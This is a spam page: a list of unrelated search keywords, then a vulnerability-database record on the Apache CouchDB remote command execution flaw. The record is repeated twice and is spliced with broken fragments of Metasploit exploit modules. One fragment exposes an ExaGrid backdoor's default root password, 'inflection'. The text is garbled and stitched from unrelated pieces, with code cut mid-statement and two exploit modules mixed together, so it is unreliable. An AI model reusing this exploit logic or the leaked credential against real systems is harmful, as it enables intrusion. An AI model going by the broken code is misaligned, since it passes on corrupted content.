Ayesha Vardag Daily Mail,
Morten Primdahl, Zendesk,
Chris Wright Twitter,
Hungarian Minimum Wage Per Hour,
Fibonacci Extension Levels,
Buster Bluth Hand,
Ccim 101 Exam Answers,
Ranger Boats Parts,
1944 Steel Penny Pawn Stars,
Fergus Souttar Footballer,
Reed Group Disability Guidelines,
How To Allow Substitutions On Walmart Grocery,
Body Troopers Full Movie,
What Channel Is The Paramount Network On,
Magnit Supermarket Russia,
Gleason Lake Public Access,
Hampton Inn Duluth, Mn,
Norwegian Food Oslo,
Camille Gottlieb Net Worth,
Burberry Touch Review,
Valenciennes Fc Shop,
Bass Fishing With Spinnerbaits,
Joan Collins Cocktail,
Rise Of The Teenage Mutant Ninja Turtles Raphael Toy,
Fjällräven Men's Backpack,
Charlotte Hornets Best Players 2020,
Musky Rod Reel Combo,
Restaurants With Private Rooms Scarborough,
Ccim 101 Exam Answers,
Weekend Trips From Cologne,
Miles Bastianich Providence College,
Nick's Del Mar,
Ancient Architecture Synonyms,
Tourist Information Centre Plan,
12v Led Driver Dimmable,
North West Singapore Map,
Long Term Forecast,
Does Prince Charles Have A Passport,
Tradingview Chart Vs Thinkorswim,
Emergency Scene Ahead Sign Meaning,
Sea Garden Cafe,
Chippewa Flowage Musky Jaws,
House Payne Castle,
Musconetcong River Fishing Map,
Algerian Arabic Dictionary,
Fly Fishing For Pike Setup,
Scarlett Bowman Artist,
1 Newton Is Equal To,
Ben Davis Ozark Death,
The Apparatus Used To Measure Heat Is Called A,
Tradingview Paper Trading Account,
The Secret Race Review,
Https Jobs Liberty Edu Postings Search,
What Does Uln Stand For In Law Enforcement,
Skip-the-line Colosseum Tour With Underground & Arena Floor Access,
Provo Library Login,
Docusign Canada Login,
Paul Millsap Instagram,
William Howard Blackbeard,
Cadence Bangalore Careers,
Polk Sports Middle School Boys Basketball,
Luxury Weekend Getaway Near Me,
Musconetcong River Fishing Map,
Geometry Puzzles With Solutions,
Elissa Slotkin Family,
Joan Of England Death,
Finland Minimum Wage In Euro,
Rogers-internet Cell Phone Bundle,
Wrike Logo Svg,
What Is Datafox,
Sri Homes Floor Plans,
Importance Of Public Broadcasting,
Jhooth Bole Kauwa Kaate (jhooth Bole Kauwa Kaate / Soundtrack Version),
Erik Knudsen Slender Man,
Four Five Cbd,
Rap Game Season 3,
Aspera Faspex App,
Jared Jeffries Net Worth,
Stefan Richter Wife,
Lake Winnipegosis Monster,
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\n", "published": "2018-03-27T09:43:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html", "http://docs.couchdb.org/en/latest/cve/2017-12636.html", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "lastseen": "2020-05-18T10:19:26", "history": [], "viewCount": 99, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2020-05-18T10:19:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12635", "CVE-2017-12636"]}, {"type": "seebug", "idList": ["SSV:96869"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873882", "OPENVAS:1361412562310873886", "OPENVAS:1361412562310873892", "OPENVAS:1361412562310107259", "OPENVAS:1361412562310873893", "OPENVAS:1361412562310107258", "OPENVAS:1361412562310891252"]}, {"type": "gentoo", "idList": ["GLSA-201711-16"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:148273", "PACKETSTORM:147295"]}, {"type": "zdt", "idList": ["1337DAY-ID-30226", "1337DAY-ID-30713", "1337DAY-ID-29083", "1337DAY-ID-30608"]}, {"type": "nessus", "idList": ["FEDORA_2017-A20D92573B.NASL", "GENTOO_GLSA-201711-16.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL", "DEBIAN_DLA-1252.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:44498", "EDB-ID:44913", "EDB-ID:45019"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1252-1:853FC"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FE23A23D6F2682CE0AFF06B76414F327", "EXPLOITPACK:A9E6BFA0E5E6880671080D586B43B822"]}, {"type": "freebsd", "idList": ["1E54D140-8493-11E8-A795-0028F8D09152"]}, {"type": "canvas", "idList": ["COUCHDB_ROLES"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/COUCHDB/COUCHDB_ENUM"]}], "modified": "2020-05-18T10:19:26", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_couchdb_cmd_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-18T10:19:26", "differentElements": ["sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/HTTP/APACHE_COUCHDB_CMD_EXEC", "hash": "67e0449ffdfc919a5a9e0f75fe16ee66", "type": "metasploit", "bulletinFamily": "exploit", "title": "Apache CouchDB Arbitrary Command Execution", "description": "CouchDB administrative users can configure the database server via HTTP(S). ']),\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk. \")\n return false\n end\n\n if res && res.code == 401\n print_bad(\"#{peer} - Authentication required.\")\n return false\n end\n\n if res && res.code == 200\n res_json = res.get_json_document\n\n if res_json.empty?\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\n return false\n end\n\n @version = res_json['version'] if res_json['version']\n return true\n end\n\n vprint_warning(\"#{peer} - Version not found\")\n return true\n end\n\n def send_payload(version)\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\n\n version = Gem::Version.new(@version)\n if version.version.empty?\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\n # if target set Automatic, exploit failed.\n if target == targets[0]\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\n elsif target == targets[1]\n payload1\n elsif target == targets[2]\n payload2\n end\n elsif version < Gem::Version.new('1.7.0')\n payload1\n elsif version.between? Additionally, this module will\n attempt to use the default password for root, 'inflection'.\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Payload' =>\n {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find',\n },\n },\n 'Author' => ['egypt'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-1560' ], # password\n [ 'CVE', '2016-1561' ], # private key\n [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]\n ],\n 'DisclosureDate' => \"Apr 07 2016\",\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\n 'DefaultTarget' => 0\n }))\n\n register_options(\n [\n # Since we don't include Tcp, we have to register this manually\n Opt::RHOST(),\n Opt::RPORT(22)\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\n", "published": "2018-03-27T09:43:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html", "http://docs.couchdb.org/en/latest/cve/2017-12636.html", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "lastseen": "2020-05-18T10:19:26", "history": [], "viewCount": 99, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2020-05-18T10:19:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12635", "CVE-2017-12636"]}, {"type": "seebug", "idList": ["SSV:96869"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873882", "OPENVAS:1361412562310873886", "OPENVAS:1361412562310873892", "OPENVAS:1361412562310107259", "OPENVAS:1361412562310873893", "OPENVAS:1361412562310107258", "OPENVAS:1361412562310891252"]}, {"type": "gentoo", "idList": ["GLSA-201711-16"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:148273", "PACKETSTORM:147295"]}, {"type": "zdt", "idList": ["1337DAY-ID-30226", "1337DAY-ID-30713", "1337DAY-ID-29083", "1337DAY-ID-30608"]}, {"type": "nessus", "idList": ["FEDORA_2017-A20D92573B.NASL", "GENTOO_GLSA-201711-16.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL", "DEBIAN_DLA-1252.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:44498", "EDB-ID:44913", "EDB-ID:45019"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1252-1:853FC"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FE23A23D6F2682CE0AFF06B76414F327", "EXPLOITPACK:A9E6BFA0E5E6880671080D586B43B822"]}, {"type": "freebsd", "idList": ["1E54D140-8493-11E8-A795-0028F8D09152"]}, {"type": "canvas", "idList": ["COUCHDB_ROLES"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/COUCHDB/COUCHDB_ENUM"]}], "modified": "2020-05-18T10:19:26", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_couchdb_cmd_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-18T10:19:26", "differentElements": ["sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/HTTP/APACHE_COUCHDB_CMD_EXEC", "hash": "67e0449ffdfc919a5a9e0f75fe16ee66", "type": "metasploit", "bulletinFamily": "exploit", "title": "Apache CouchDB Arbitrary Command Execution", "description": "CouchDB administrative users can configure the database server via HTTP(S). ']),\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk. \")\n return false\n end\n\n if res && res.code == 401\n print_bad(\"#{peer} - Authentication required.\")\n return false\n end\n\n if res && res.code == 200\n res_json = res.get_json_document\n\n if res_json.empty?\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\n return false\n end\n\n @version = res_json['version'] if res_json['version']\n return true\n end\n\n vprint_warning(\"#{peer} - Version not found\")\n return true\n end\n\n def send_payload(version)\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\n\n version = Gem::Version.new(@version)\n if version.version.empty?\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\n # if target set Automatic, exploit failed.\n if target == targets[0]\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\n elsif target == targets[1]\n payload1\n elsif target == targets[2]\n payload2\n end\n elsif version < Gem::Version.new('1.7.0')\n payload1\n elsif version.between? Additionally, this module will\n attempt to use the default password for root, 'inflection'.\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Payload' =>\n {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find',\n },\n },\n 'Author' => ['egypt'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-1560' ], # password\n [ 'CVE', '2016-1561' ], # private key\n [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]\n ],\n 'DisclosureDate' => \"Apr 07 2016\",\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\n 'DefaultTarget' => 0\n }))\n\n register_options(\n [\n # Since we don't include Tcp, we have to register this manually\n Opt::RHOST(),\n Opt::RPORT(22)\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!